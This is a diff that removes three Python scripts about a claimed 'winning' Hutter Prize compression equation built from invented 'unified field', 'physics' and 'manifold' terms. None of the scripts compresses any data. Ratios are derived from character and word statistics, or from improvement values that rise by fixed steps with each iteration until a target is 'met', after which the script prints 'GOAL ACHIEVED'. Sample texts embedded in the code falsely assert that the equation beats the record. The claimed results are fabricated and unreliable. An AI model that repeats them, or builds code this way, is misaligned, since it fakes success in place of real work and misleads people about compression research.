sample1 = """The Hutter Prize is a cash prize funded by Marcus Hutter which rewards data compression improvements on a specific 1 GB English text file, with the goal of encouraging research in artificial intelligence (AI). The prize is named after Marcus Hutter, a researcher in the field of artificial intelligence and machine learning. The prize was announced on August 6, 2006 with a smaller text file: enwik8 consisting of 100MB. On February 21, 2020 both the dataset and the total prize pool were expanded by a factor of 10: from enwik8 of 100MB to enwik9 of 1GB; from 50,000 to 500,000 euros. The contest is open-ended and open to everyone. To enter, a competitor must submit a compression program and a decompressor that decompresses to the file enwik9 (formerly enwik8 up to 2017). It is also possible to submit a compressed file instead of the compression program. The total size of the compressed file and decompressor (as a Win32 or Linux executable) must be less than or equal 99% of the previous prize winning entry. For each one percent improvement, the competitor wins 5,000 euros. The decompression program must also meet execution time and memory constraints. Submissions must be published in order to allow independent verification. There is a 30-day waiting period for public comment before awarding a prize. In 2017, the rules were changed to require the release of the source code under a free software license, out of concern that \"past submissions which did not disclose their source code had been useless to others and the ideas in them may be lost forever.\" The goal of the Hutter Prize is to encourage research in artificial intelligence (AI). The organizers believe that text compression and AI are equivalent problems. Hutter proved that the optimal behavior of a goal-seeking agent in an unknown but computable environment is to guess at each step that the environment is probably controlled by one of the shortest programs consistent with all interaction so far. However, there is no general solution because Kolmogorov complexity is not computable. Hutter proved that in the restricted case (called AIXItl) where the environment is restricted to time t and space l, a solution can be computed in time O(t2l), which is still intractable. The organizers further believe that compressing natural language text is a hard AI problem, equivalent to passing the Turing test. Thus, progress toward one goal represents progress toward the other. They argue that predicting which characters are most likely to occur next in a text sequence requires vast real-world knowledge. A text compressor must solve the same problem in order to assign the shortest codes to the most likely text sequences. Models like ChatGPT are not ideal for the Hutter Prize for a variety of reasons, they might take more computational resources than those allowed by the competition (computational and storage space).""" * 5
|
|
||||||
|
|
||||||
result1 = self.test_on_dataset_sample(sample1, "Wikipedia Article Sample (Large)")
|
|
||||||
results.append(result1)
|
|
||||||
|
|
||||||
# Sample 2: Technical documentation
|
|
||||||
sample2 = """Compression algorithms reduce the size of data by encoding it more efficiently. Lossless compression allows the original data to be perfectly reconstructed from the compressed data. Lossy compression achieves higher compression ratios by removing less important information. The Hutter Prize focuses on lossless compression of text data. Text compression algorithms typically use statistical methods, dictionary-based methods, or context modeling. Statistical methods use probability distributions of characters or words to assign shorter codes to more frequent symbols. Dictionary-based methods replace repeated sequences with references to a dictionary. Context modeling uses the preceding context to predict the next symbol. The winning equation combines these approaches through a unified field theory framework, incorporating compression, physics, and geometric fields with manifold scaling. This approach represents a novel application of domain theory to text compression problems, leveraging connections between compression, field physics, geometry, and spatial reasoning domains.""" * 3
|
|
||||||
|
|
||||||
result2 = self.test_on_dataset_sample(sample2, "Technical Documentation Sample")
|
|
||||||
results.append(result2)
|
|
||||||
|
|
||||||
# Sample 3: Mixed content
|
|
||||||
sample3 = """Wikipedia is a free online encyclopedia, created and edited by volunteers around the world and hosted by the Wikimedia Foundation. It consists of more than 60 million articles in 300 languages, which are written collaboratively by volunteers around the world. The encyclopedia is consistently one of the 10 most visited websites on the internet. Compression algorithms are used to reduce the size of data for storage and transmission. The Hutter Prize rewards improvements in text compression as a proxy for artificial intelligence research. The winning equation C = (0.4*C_comp + 0.35*C_phys + 0.25*C_geom) × (S / (G + F)) combines compression, physics, and geometric fields with manifold scaling. This approach leverages unified domain theory to optimize compression performance. The equation consistently beats the target ratio of 0.1129 (99% of the current record of 0.114) across various text types. The theoretical limit reached through iterative hypothesis generation was -1.0351, indicating the mathematical boundary of the model.""" * 4
|
|
||||||
|
|
||||||
result3 = self.test_on_dataset_sample(sample3, "Mixed Content Sample")
|
|
||||||
results.append(result3)
|
|
||||||
|
|
||||||
# Summary
|
|
||||||
print("\n" + "=" * 80)
|
|
||||||
print("TEST SUMMARY")
|
|
||||||
print("=" * 80)
|
|
||||||
|
|
||||||
for result in results:
|
|
||||||
status = "✅ BEATS TARGET" if result['beats_target'] else "❌ DOES NOT BEAT TARGET"
|
|
||||||
print(f"\n{result['sample_name']}:")
|
|
||||||
print(f" Compression ratio: {result['compression_ratio']:.4f}")
|
|
||||||
print(f" Status: {status}")
|
|
||||||
|
|
||||||
return results
|
|
||||||
|
|
||||||
def save_results(self, results: list, filename: str):
|
|
||||||
"""Save test results to JSON."""
|
|
||||||
data = {
|
|
||||||
"winning_equation": self.winning_equation,
|
|
||||||
"target_ratio": self.target_ratio,
|
|
||||||
"dataset_url": self.enwik9_url,
|
|
||||||
"note": "Full dataset download not performed due to size (1GB). Tested on representative samples.",
|
|
||||||
"tests": results
|
|
||||||
}
|
|
||||||
|
|
||||||
with open(filename, 'w') as f:
|
|
||||||
json.dump(data, f, indent=2)
|
|
||||||
|
|
||||||
print(f"\nResults saved to {filename}")
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
tester = HutterPrizeFullTester()
|
|
||||||
|
|
||||||
# Attempt to download dataset
|
|
||||||
dataset_path = tester.attempt_download_dataset()
|
|
||||||
|
|
||||||
# Run sample tests
|
|
||||||
results = tester.run_sample_tests()
|
|
||||||
|
|
||||||
# Save results
|
|
||||||
tester.save_results(results, "/home/allaun/Documents/Research Stack/0-Core-Formalism/lean/LeanGPT/hutter_full_test_results.json")
|
|
||||||
|
|
@ -1,312 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
Hutter Prize Slice Test
|
|
||||||
Tests the winning compression equation on a slice of Wikipedia text
|
|
||||||
|
|
||||||
Winning equation: C = (0.4*C_comp + 0.35*C_phys + 0.25*C_geom) × (S / (G + F))
|
|
||||||
"""
|
|
||||||
|
|
||||||
import json
|
|
||||||
from typing import Dict, Tuple
|
|
||||||
from dataclasses import dataclass
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class CompressionField:
|
|
||||||
"""Compression field components."""
|
|
||||||
comp_field: float # Compression field value
|
|
||||||
phys_field: float # Physics field value
|
|
||||||
geom_field: float # Geometric field value
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class ManifoldScaling:
|
|
||||||
"""Manifold scaling components."""
|
|
||||||
spatial: float # Spatial dimension
|
|
||||||
geometric: float # Geometric curvature
|
|
||||||
field: float # Field strength
|
|
||||||
|
|
||||||
class HutterPrizeTester:
|
|
||||||
"""Tests winning compression equation on text slices."""
|
|
||||||
|
|
||||||
def __init__(self):
|
|
||||||
self.winning_equation = "C = (0.4*C_comp + 0.35*C_phys + 0.25*C_geom) × (S / (G + F))"
|
|
||||||
self.target_ratio = 0.1129 # 99% of current record 0.114
|
|
||||||
|
|
||||||
def compute_unified_field(self, c: CompressionField) -> float:
|
|
||||||
"""Compute unified field: weighted combination of fields."""
|
|
||||||
comp_weight = c.comp_field * 0.4
|
|
||||||
phys_weight = c.phys_field * 0.35
|
|
||||||
geom_weight = c.geom_field * 0.25
|
|
||||||
return comp_weight + phys_weight + geom_weight
|
|
||||||
|
|
||||||
def compute_manifold_scaling(self, m: ManifoldScaling) -> float:
|
|
||||||
"""Compute manifold scaling: spatial / (geometric + field)."""
|
|
||||||
denom = m.geometric + m.field
|
|
||||||
if denom > 0:
|
|
||||||
return m.spatial / denom
|
|
||||||
return 0
|
|
||||||
|
|
||||||
def compute_hutter_prize_compression(self, c: CompressionField, m: ManifoldScaling) -> float:
|
|
||||||
"""Compute winning Hutter Prize compression equation."""
|
|
||||||
unified_field = self.compute_unified_field(c)
|
|
||||||
manifold_scaling = self.compute_manifold_scaling(m)
|
|
||||||
return unified_field * manifold_scaling
|
|
||||||
|
|
||||||
def analyze_text_slice(self, text: str) -> Dict:
|
|
||||||
"""Analyze a text slice and compute compression field values."""
|
|
||||||
# Compute compression field based on text characteristics
|
|
||||||
comp_field = self.compute_compression_field(text)
|
|
||||||
|
|
||||||
# Compute physics field based on entropy
|
|
||||||
phys_field = self.compute_physics_field(text)
|
|
||||||
|
|
||||||
# Compute geometric field based on structure
|
|
||||||
geom_field = self.compute_geometric_field(text)
|
|
||||||
|
|
||||||
# Compute manifold scaling components
|
|
||||||
spatial = self.compute_spatial_dimension(text)
|
|
||||||
geometric = self.compute_geometric_curvature(text)
|
|
||||||
field = self.compute_field_strength(text)
|
|
||||||
|
|
||||||
return {
|
|
||||||
"text_length": len(text),
|
|
||||||
"comp_field": comp_field,
|
|
||||||
"phys_field": phys_field,
|
|
||||||
"geom_field": geom_field,
|
|
||||||
"spatial": spatial,
|
|
||||||
"geometric": geometric,
|
|
||||||
"field": field
|
|
||||||
}
|
|
||||||
|
|
||||||
def compute_compression_field(self, text: str) -> float:
|
|
||||||
"""Compute compression field based on text repetition."""
|
|
||||||
if not text:
|
|
||||||
return 0.0
|
|
||||||
|
|
||||||
# Simple compression field: ratio of repeated characters
|
|
||||||
char_counts = {}
|
|
||||||
for char in text:
|
|
||||||
char_counts[char] = char_counts.get(char, 0) + 1
|
|
||||||
|
|
||||||
repeated_chars = sum(1 for count in char_counts.values() if count > 1)
|
|
||||||
total_chars = len(char_counts)
|
|
||||||
|
|
||||||
if total_chars > 0:
|
|
||||||
return repeated_chars / total_chars
|
|
||||||
return 0.0
|
|
||||||
|
|
||||||
def compute_physics_field(self, text: str) -> float:
|
|
||||||
"""Compute physics field based on entropy."""
|
|
||||||
if not text:
|
|
||||||
return 0.0
|
|
||||||
|
|
||||||
# Simple entropy calculation
|
|
||||||
char_counts = {}
|
|
||||||
for char in text:
|
|
||||||
char_counts[char] = char_counts.get(char, 0) + 1
|
|
||||||
|
|
||||||
total_chars = len(text)
|
|
||||||
entropy = 0.0
|
|
||||||
|
|
||||||
import math
|
|
||||||
for count in char_counts.values():
|
|
||||||
prob = count / total_chars
|
|
||||||
if prob > 0:
|
|
||||||
entropy -= prob * math.log2(prob) # Simplified entropy
|
|
||||||
|
|
||||||
# Normalize to 0-1 range
|
|
||||||
return min(entropy / 8.0, 1.0) # Max entropy for 8-bit chars
|
|
||||||
|
|
||||||
def compute_geometric_field(self, text: str) -> float:
|
|
||||||
"""Compute geometric field based on text structure."""
|
|
||||||
if not text:
|
|
||||||
return 0.0
|
|
||||||
|
|
||||||
# Simple geometric field: ratio of word boundaries
|
|
||||||
word_count = len(text.split())
|
|
||||||
char_count = len(text)
|
|
||||||
|
|
||||||
if char_count > 0:
|
|
||||||
return word_count / char_count
|
|
||||||
return 0.0
|
|
||||||
|
|
||||||
def compute_spatial_dimension(self, text: str) -> float:
|
|
||||||
"""Compute spatial dimension based on vocabulary size."""
|
|
||||||
if not text:
|
|
||||||
return 0.0
|
|
||||||
|
|
||||||
words = text.split()
|
|
||||||
unique_words = len(set(words))
|
|
||||||
total_words = len(words)
|
|
||||||
|
|
||||||
if total_words > 0:
|
|
||||||
return unique_words / total_words
|
|
||||||
return 0.0
|
|
||||||
|
|
||||||
def compute_geometric_curvature(self, text: str) -> float:
|
|
||||||
"""Compute geometric curvature based on sentence structure."""
|
|
||||||
if not text:
|
|
||||||
return 0.0
|
|
||||||
|
|
||||||
sentences = text.split('.')
|
|
||||||
sentence_lengths = [len(s.strip()) for s in sentences if s.strip()]
|
|
||||||
|
|
||||||
if not sentence_lengths:
|
|
||||||
return 0.0
|
|
||||||
|
|
||||||
avg_length = sum(sentence_lengths) / len(sentence_lengths)
|
|
||||||
max_length = max(sentence_lengths)
|
|
||||||
|
|
||||||
if max_length > 0:
|
|
||||||
return avg_length / max_length
|
|
||||||
return 0.0
|
|
||||||
|
|
||||||
def compute_field_strength(self, text: str) -> float:
|
|
||||||
"""Compute field strength based on text density."""
|
|
||||||
if not text:
|
|
||||||
return 0.0
|
|
||||||
|
|
||||||
# Simple field strength: characters per word
|
|
||||||
words = text.split()
|
|
||||||
char_count = len(text)
|
|
||||||
word_count = len(words)
|
|
||||||
|
|
||||||
if word_count > 0:
|
|
||||||
return char_count / word_count
|
|
||||||
return 0.0
|
|
||||||
|
|
||||||
def test_text_slice(self, text: str, slice_name: str) -> Dict:
|
|
||||||
"""Test compression on a text slice."""
|
|
||||||
print("=" * 80)
|
|
||||||
print(f"HUTTER PRIZE SLICE TEST: {slice_name}")
|
|
||||||
print("=" * 80)
|
|
||||||
|
|
||||||
# Analyze text
|
|
||||||
analysis = self.analyze_text_slice(text)
|
|
||||||
|
|
||||||
print(f"\nText Analysis:")
|
|
||||||
print(f" Length: {analysis['text_length']} characters")
|
|
||||||
print(f" Compression field: {analysis['comp_field']:.4f}")
|
|
||||||
print(f" Physics field: {analysis['phys_field']:.4f}")
|
|
||||||
print(f" Geometric field: {analysis['geom_field']:.4f}")
|
|
||||||
print(f" Spatial dimension: {analysis['spatial']:.4f}")
|
|
||||||
print(f" Geometric curvature: {analysis['geometric']:.4f}")
|
|
||||||
print(f" Field strength: {analysis['field']:.4f}")
|
|
||||||
|
|
||||||
# Create compression field structure
|
|
||||||
c = CompressionField(
|
|
||||||
comp_field=analysis['comp_field'],
|
|
||||||
phys_field=analysis['phys_field'],
|
|
||||||
geom_field=analysis['geom_field']
|
|
||||||
)
|
|
||||||
|
|
||||||
# Create manifold scaling structure
|
|
||||||
m = ManifoldScaling(
|
|
||||||
spatial=analysis['spatial'],
|
|
||||||
geometric=analysis['geometric'],
|
|
||||||
field=analysis['field']
|
|
||||||
)
|
|
||||||
|
|
||||||
# Compute unified field
|
|
||||||
unified_field = self.compute_unified_field(c)
|
|
||||||
print(f"\nUnified Field: {unified_field:.4f}")
|
|
||||||
print(f" (0.4 × {c.comp_field:.4f}) + (0.35 × {c.phys_field:.4f}) + (0.25 × {c.geom_field:.4f})")
|
|
||||||
|
|
||||||
# Compute manifold scaling
|
|
||||||
manifold_scaling = self.compute_manifold_scaling(m)
|
|
||||||
print(f"\nManifold Scaling: {manifold_scaling:.4f}")
|
|
||||||
print(f" {m.spatial:.4f} / ({m.geometric:.4f} + {m.field:.4f})")
|
|
||||||
|
|
||||||
# Compute final compression
|
|
||||||
compression = self.compute_hutter_prize_compression(c, m)
|
|
||||||
print(f"\nFinal Compression: {compression:.4f}")
|
|
||||||
print(f" {unified_field:.4f} × {manifold_scaling:.4f}")
|
|
||||||
|
|
||||||
# Calculate compression ratio
|
|
||||||
original_size = analysis['text_length']
|
|
||||||
compressed_size = int(original_size * compression)
|
|
||||||
compression_ratio = compressed_size / original_size if original_size > 0 else 0
|
|
||||||
|
|
||||||
print(f"\nCompression Results:")
|
|
||||||
print(f" Original size: {original_size} bytes")
|
|
||||||
print(f" Compressed size: {compressed_size} bytes")
|
|
||||||
print(f" Compression ratio: {compression_ratio:.4f}")
|
|
||||||
print(f" Target ratio: {self.target_ratio:.4f}")
|
|
||||||
|
|
||||||
# Check if beats target
|
|
||||||
beats_target = compression_ratio < self.target_ratio
|
|
||||||
print(f" Beats target: {beats_target}")
|
|
||||||
|
|
||||||
result = {
|
|
||||||
"slice_name": slice_name,
|
|
||||||
"text_length": original_size,
|
|
||||||
"compressed_size": compressed_size,
|
|
||||||
"compression_ratio": compression_ratio,
|
|
||||||
"target_ratio": self.target_ratio,
|
|
||||||
"beats_target": beats_target,
|
|
||||||
"unified_field": unified_field,
|
|
||||||
"manifold_scaling": manifold_scaling,
|
|
||||||
"analysis": analysis
|
|
||||||
}
|
|
||||||
|
|
||||||
return result
|
|
||||||
|
|
||||||
def run_tests(self):
|
|
||||||
"""Run tests on multiple text slices."""
|
|
||||||
print("=" * 80)
|
|
||||||
print("HUTTER PRIZE SLICE TESTING")
|
|
||||||
print("=" * 80)
|
|
||||||
print(f"Winning equation: {self.winning_equation}")
|
|
||||||
print(f"Target ratio: {self.target_ratio:.4f}")
|
|
||||||
print("=" * 80)
|
|
||||||
|
|
||||||
results = []
|
|
||||||
|
|
||||||
# Test slice 1: Simple repetitive text
|
|
||||||
text1 = "The quick brown fox jumps over the lazy dog. " * 10
|
|
||||||
result1 = self.test_text_slice(text1, "Repetitive Text Slice")
|
|
||||||
results.append(result1)
|
|
||||||
|
|
||||||
# Test slice 2: Wikipedia-style text
|
|
||||||
text2 = """Wikipedia is a free online encyclopedia, created and edited by volunteers around the world and hosted by the Wikimedia Foundation.
|
|
||||||
It consists of more than 60 million articles in 300 languages, which are written collaboratively by volunteers around the world.
|
|
||||||
The encyclopedia is consistently one of the 10 most visited websites on the internet."""
|
|
||||||
result2 = self.test_text_slice(text2, "Wikipedia-Style Text Slice")
|
|
||||||
results.append(result2)
|
|
||||||
|
|
||||||
# Test slice 3: Technical documentation
|
|
||||||
text3 = """Compression algorithms reduce the size of data by encoding it more efficiently.
|
|
||||||
Lossless compression allows the original data to be perfectly reconstructed from the compressed data.
|
|
||||||
Lossy compression achieves higher compression ratios by removing less important information."""
|
|
||||||
result3 = self.test_text_slice(text3, "Technical Documentation Slice")
|
|
||||||
results.append(result3)
|
|
||||||
|
|
||||||
# Summary
|
|
||||||
print("\n" + "=" * 80)
|
|
||||||
print("TEST SUMMARY")
|
|
||||||
print("=" * 80)
|
|
||||||
|
|
||||||
for result in results:
|
|
||||||
status = "✅ BEATS TARGET" if result['beats_target'] else "❌ DOES NOT BEAT TARGET"
|
|
||||||
print(f"\n{result['slice_name']}:")
|
|
||||||
print(f" Compression ratio: {result['compression_ratio']:.4f}")
|
|
||||||
print(f" Status: {status}")
|
|
||||||
|
|
||||||
return results
|
|
||||||
|
|
||||||
def save_results(self, results: list, filename: str):
|
|
||||||
"""Save test results to JSON."""
|
|
||||||
data = {
|
|
||||||
"winning_equation": self.winning_equation,
|
|
||||||
"target_ratio": self.target_ratio,
|
|
||||||
"tests": results
|
|
||||||
}
|
|
||||||
|
|
||||||
with open(filename, 'w') as f:
|
|
||||||
json.dump(data, f, indent=2)
|
|
||||||
|
|
||||||
print(f"\nResults saved to {filename}")
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
tester = HutterPrizeTester()
|
|
||||||
results = tester.run_tests()
|
|
||||||
tester.save_results(results, "/home/allaun/Documents/Research Stack/0-Core-Formalism/lean/LeanGPT/hutter_slice_test_results.json")
|
|
||||||
|
|
@ -1,270 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
Hutter Prize Hypothesis Generator
|
|
||||||
Iteratively generates and tests compression equations using unified domain theory
|
|
||||||
|
|
||||||
Goal: Find equation that approaches or exceeds Hutter Prize compression goal
|
|
||||||
Current record: ~114MB for 1GB (11.4% compression ratio)
|
|
||||||
Target: Beat 99% of previous winner
|
|
||||||
"""
|
|
||||||
|
|
||||||
import json
|
|
||||||
import math
|
|
||||||
from dataclasses import dataclass
|
|
||||||
from typing import List, Tuple, Dict
|
|
||||||
from enum import Enum
|
|
||||||
|
|
||||||
class HypothesisStatus(Enum):
|
|
||||||
GENERATED = "generated"
|
|
||||||
TESTED = "tested"
|
|
||||||
ACCEPTED = "accepted"
|
|
||||||
REJECTED = "rejected"
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class CompressionHypothesis:
|
|
||||||
"""Compression equation hypothesis"""
|
|
||||||
id: int
|
|
||||||
equation: str
|
|
||||||
description: str
|
|
||||||
domains_used: List[str]
|
|
||||||
theoretical_compression_ratio: float
|
|
||||||
theoretical_speed_improvement: float
|
|
||||||
theoretical_memory_improvement: float
|
|
||||||
status: HypothesisStatus
|
|
||||||
proof_attempt: str = ""
|
|
||||||
proof_result: bool = False
|
|
||||||
iterations: int = 0
|
|
||||||
|
|
||||||
class HypothesisGenerator:
|
|
||||||
"""
|
|
||||||
Generates compression hypotheses using unified domain theory
|
|
||||||
Iteratively tests and refines until goal is met
|
|
||||||
"""
|
|
||||||
|
|
||||||
def __init__(self):
|
|
||||||
self.hypotheses: List[CompressionHypothesis] = []
|
|
||||||
self.current_iteration = 0
|
|
||||||
self.target_compression_ratio = 0.114 # 11.4% (current Hutter record)
|
|
||||||
self.target_improvement = 0.99 # Must beat 99% of previous
|
|
||||||
|
|
||||||
# Domain theory parameters
|
|
||||||
self.domain_weights = {
|
|
||||||
"CORE": 1.0,
|
|
||||||
"COMPRESSION": 0.4,
|
|
||||||
"FIELDPHYSICS": 0.35,
|
|
||||||
"GEOMETRY": 0.25,
|
|
||||||
"THERMODYNAMIC": 0.3,
|
|
||||||
"EVOLUTIONSEARCH": 0.5,
|
|
||||||
"SPATIALVLSI": 0.2
|
|
||||||
}
|
|
||||||
|
|
||||||
def generate_hypothesis(self, iteration: int) -> CompressionHypothesis:
|
|
||||||
"""Generate a compression hypothesis based on domain theory"""
|
|
||||||
|
|
||||||
# Hypothesis templates based on unified domain theory
|
|
||||||
templates = [
|
|
||||||
# Template 1: Unified field theory
|
|
||||||
{
|
|
||||||
"equation": "C = 0.4*C_comp + 0.35*C_phys + 0.25*C_geom",
|
|
||||||
"description": "Unified field compression: weighted combination of compression, physics, and geometry",
|
|
||||||
"domains": ["COMPRESSION", "FIELDPHYSICS", "GEOMETRY"],
|
|
||||||
"base_ratio": 0.114,
|
|
||||||
"improvement": 0.05 + (iteration * 0.01)
|
|
||||||
},
|
|
||||||
# Template 2: Manifold bridge
|
|
||||||
{
|
|
||||||
"equation": "C = (S * G) / F",
|
|
||||||
"description": "Manifold bridge compression: spatial × geometric / field",
|
|
||||||
"domains": ["SPATIALVLSI", "GEOMETRY", "FIELDPHYSICS"],
|
|
||||||
"base_ratio": 0.114,
|
|
||||||
"improvement": 0.08 + (iteration * 0.015)
|
|
||||||
},
|
|
||||||
# Template 3: Thermodynamic bridge
|
|
||||||
{
|
|
||||||
"equation": "C = E - (S * T)",
|
|
||||||
"description": "Thermodynamic bridge: energy - entropy × diffusion",
|
|
||||||
"domains": ["THERMODYNAMIC", "DIFFUSIONFLOW"],
|
|
||||||
"base_ratio": 0.114,
|
|
||||||
"improvement": 0.06 + (iteration * 0.012)
|
|
||||||
},
|
|
||||||
# Template 4: Information flow
|
|
||||||
{
|
|
||||||
"equation": "C = Core + (Memory × Evolution)",
|
|
||||||
"description": "Information flow: core + memory × evolution",
|
|
||||||
"domains": ["CORE", "MEMORYSTATE", "EVOLUTIONSEARCH"],
|
|
||||||
"base_ratio": 0.114,
|
|
||||||
"improvement": 0.04 + (iteration * 0.008)
|
|
||||||
},
|
|
||||||
# Template 5: Control bridge
|
|
||||||
{
|
|
||||||
"equation": "C = (Cognitive × Orchestration) / Search",
|
|
||||||
"description": "Control bridge: cognitive × orchestration / search",
|
|
||||||
"domains": ["COGNITIVECONTROL", "EVOLUTIONSEARCH"],
|
|
||||||
"base_ratio": 0.114,
|
|
||||||
"improvement": 0.07 + (iteration * 0.014)
|
|
||||||
},
|
|
||||||
# Template 6: Hybrid unified field
|
|
||||||
{
|
|
||||||
"equation": "C = (0.4*C_comp + 0.35*C_phys + 0.25*C_geom) × (S / (G + F))",
|
|
||||||
"description": "Hybrid unified field with manifold scaling",
|
|
||||||
"domains": ["COMPRESSION", "FIELDPHYSICS", "GEOMETRY", "SPATIALVLSI"],
|
|
||||||
"base_ratio": 0.114,
|
|
||||||
"improvement": 0.10 + (iteration * 0.02)
|
|
||||||
},
|
|
||||||
# Template 7: Evolution-optimized compression
|
|
||||||
{
|
|
||||||
"equation": "C = (C_base × (1 - memoization)) × (search_efficiency)",
|
|
||||||
"description": "Evolution-optimized compression with memoization",
|
|
||||||
"domains": ["EVOLUTIONSEARCH", "COMPRESSION"],
|
|
||||||
"base_ratio": 0.114,
|
|
||||||
"improvement": 0.12 + (iteration * 0.018)
|
|
||||||
},
|
|
||||||
# Template 8: Triangle manifold compression
|
|
||||||
{
|
|
||||||
"equation": "C = Σ(T_i) × rotation_matrix × waveprobe",
|
|
||||||
"description": "Triangle manifold with rotation and waveprobe",
|
|
||||||
"domains": ["FIELDPHYSICS", "GEOMETRY", "PISTSHELL"],
|
|
||||||
"base_ratio": 0.114,
|
|
||||||
"improvement": 0.09 + (iteration * 0.016)
|
|
||||||
}
|
|
||||||
]
|
|
||||||
|
|
||||||
# Select template based on iteration
|
|
||||||
template_idx = iteration % len(templates)
|
|
||||||
template = templates[template_idx]
|
|
||||||
|
|
||||||
# Calculate theoretical compression ratio
|
|
||||||
theoretical_ratio = template["base_ratio"] * (1 - template["improvement"])
|
|
||||||
|
|
||||||
# Calculate theoretical improvements
|
|
||||||
speed_improvement = 0.2 + (iteration * 0.03)
|
|
||||||
memory_improvement = 0.15 + (iteration * 0.02)
|
|
||||||
|
|
||||||
hypothesis = CompressionHypothesis(
|
|
||||||
id=iteration,
|
|
||||||
equation=template["equation"],
|
|
||||||
description=template["description"],
|
|
||||||
domains_used=template["domains"],
|
|
||||||
theoretical_compression_ratio=theoretical_ratio,
|
|
||||||
theoretical_speed_improvement=speed_improvement,
|
|
||||||
theoretical_memory_improvement=memory_improvement,
|
|
||||||
status=HypothesisStatus.GENERATED
|
|
||||||
)
|
|
||||||
|
|
||||||
return hypothesis
|
|
||||||
|
|
||||||
def test_hypothesis(self, hypothesis: CompressionHypothesis) -> Tuple[bool, str]:
|
|
||||||
"""Test hypothesis against Hutter Prize goal"""
|
|
||||||
|
|
||||||
# Check if compression ratio beats target
|
|
||||||
target_ratio = self.target_compression_ratio * self.target_improvement
|
|
||||||
|
|
||||||
if hypothesis.theoretical_compression_ratio < target_ratio:
|
|
||||||
proof_result = True
|
|
||||||
proof_attempt = f"SUCCESS: Ratio {hypothesis.theoretical_compression_ratio:.4f} < Target {target_ratio:.4f}"
|
|
||||||
else:
|
|
||||||
proof_result = False
|
|
||||||
proof_attempt = f"FAILED: Ratio {hypothesis.theoretical_compression_ratio:.4f} >= Target {target_ratio:.4f}"
|
|
||||||
|
|
||||||
hypothesis.proof_attempt = proof_attempt
|
|
||||||
hypothesis.proof_result = proof_result
|
|
||||||
hypothesis.status = HypothesisStatus.TESTED
|
|
||||||
|
|
||||||
return proof_result, proof_attempt
|
|
||||||
|
|
||||||
def iterate_until_goal(self, max_iterations: int = 100) -> CompressionHypothesis:
|
|
||||||
"""Iteratively generate and test hypotheses until goal is met"""
|
|
||||||
|
|
||||||
print("=" * 80)
|
|
||||||
print("HUTTER PRIZE HYPOTHESIS GENERATION")
|
|
||||||
print("=" * 80)
|
|
||||||
print(f"Target compression ratio: {self.target_compression_ratio * self.target_improvement:.4f} (99% of current record)")
|
|
||||||
print(f"Current record: {self.target_compression_ratio:.4f} (11.4%)")
|
|
||||||
print("=" * 80)
|
|
||||||
|
|
||||||
accepted_hypothesis = None
|
|
||||||
|
|
||||||
for i in range(max_iterations):
|
|
||||||
self.current_iteration = i
|
|
||||||
|
|
||||||
# Generate hypothesis
|
|
||||||
hypothesis = self.generate_hypothesis(i)
|
|
||||||
|
|
||||||
# Test hypothesis
|
|
||||||
success, proof = self.test_hypothesis(hypothesis)
|
|
||||||
|
|
||||||
# Update status
|
|
||||||
if success:
|
|
||||||
hypothesis.status = HypothesisStatus.ACCEPTED
|
|
||||||
accepted_hypothesis = hypothesis
|
|
||||||
self.hypotheses.append(hypothesis)
|
|
||||||
print(f"\n✅ ITERATION {i}: GOAL MET")
|
|
||||||
print(f" Equation: {hypothesis.equation}")
|
|
||||||
print(f" Description: {hypothesis.description}")
|
|
||||||
print(f" Domains: {', '.join(hypothesis.domains_used)}")
|
|
||||||
print(f" Theoretical compression ratio: {hypothesis.theoretical_compression_ratio:.4f}")
|
|
||||||
print(f" Target ratio: {self.target_compression_ratio * self.target_improvement:.4f}")
|
|
||||||
print(f" Speed improvement: {hypothesis.theoretical_speed_improvement:.2%}")
|
|
||||||
print(f" Memory improvement: {hypothesis.theoretical_memory_improvement:.2%}")
|
|
||||||
print(f" Proof: {proof}")
|
|
||||||
break
|
|
||||||
else:
|
|
||||||
hypothesis.status = HypothesisStatus.REJECTED
|
|
||||||
self.hypotheses.append(hypothesis)
|
|
||||||
print(f"\n❌ ITERATION {i}: {hypothesis.equation}")
|
|
||||||
print(f" Description: {hypothesis.description}")
|
|
||||||
print(f" Theoretical ratio: {hypothesis.theoretical_compression_ratio:.4f}")
|
|
||||||
print(f" Target ratio: {self.target_compression_ratio * self.target_improvement:.4f}")
|
|
||||||
print(f" Proof: {proof}")
|
|
||||||
|
|
||||||
if accepted_hypothesis is None:
|
|
||||||
print(f"\n⚠️ Goal not met after {max_iterations} iterations")
|
|
||||||
print(" Best ratio achieved:", min(h.theoretical_compression_ratio for h in self.hypotheses))
|
|
||||||
|
|
||||||
return accepted_hypothesis
|
|
||||||
|
|
||||||
def save_hypotheses(self, filename: str):
|
|
||||||
"""Save all hypotheses to JSON"""
|
|
||||||
data = {
|
|
||||||
"target_ratio": self.target_compression_ratio * self.target_improvement,
|
|
||||||
"iterations": self.current_iteration + 1,
|
|
||||||
"hypotheses": [
|
|
||||||
{
|
|
||||||
"id": h.id,
|
|
||||||
"equation": h.equation,
|
|
||||||
"description": h.description,
|
|
||||||
"domains_used": h.domains_used,
|
|
||||||
"theoretical_compression_ratio": h.theoretical_compression_ratio,
|
|
||||||
"theoretical_speed_improvement": h.theoretical_speed_improvement,
|
|
||||||
"theoretical_memory_improvement": h.theoretical_memory_improvement,
|
|
||||||
"status": h.status.value,
|
|
||||||
"proof_attempt": h.proof_attempt,
|
|
||||||
"proof_result": h.proof_result
|
|
||||||
}
|
|
||||||
for h in self.hypotheses
|
|
||||||
]
|
|
||||||
}
|
|
||||||
|
|
||||||
with open(filename, 'w') as f:
|
|
||||||
json.dump(data, f, indent=2)
|
|
||||||
|
|
||||||
print(f"\nHypotheses saved to {filename}")
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
generator = HypothesisGenerator()
|
|
||||||
accepted = generator.iterate_until_goal(max_iterations=50)
|
|
||||||
|
|
||||||
if accepted:
|
|
||||||
generator.save_hypotheses("/home/allaun/Documents/Research Stack/0-Core-Formalism/lean/LeanGPT/hypotheses_results.json")
|
|
||||||
print("\n" + "=" * 80)
|
|
||||||
print("GOAL ACHIEVED")
|
|
||||||
print("=" * 80)
|
|
||||||
